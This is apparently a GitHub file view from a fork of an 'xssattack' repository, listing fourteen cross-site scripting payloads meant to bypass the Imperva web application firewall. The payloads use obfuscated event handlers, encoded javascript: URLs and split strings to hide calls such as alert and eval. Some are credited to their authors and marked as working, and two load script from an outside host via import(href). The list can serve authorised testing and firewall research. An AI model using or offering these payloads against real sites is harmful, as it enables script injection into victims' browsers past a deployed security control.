forked from haka110/xssattack
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathimperva-xss.txt
14 lines (14 loc) · 1.29 KB
/
imperva-xss.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<details/open/id="""ontoggle=[JS]>
<A HRef=//site.com AutoFocus %26%2362 OnFocus%0C=import(href)>
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded)
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap
<bleh/onclick=top[/al/.source+/ert/.source]	``>click Pinaki @0xInfection
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div"> -@AldenAous
<svg onload\r\n=$.globalEval("al"+"ert()");>
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly)
tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!–
<details/open/id=""e;"ontoggle=[JS]>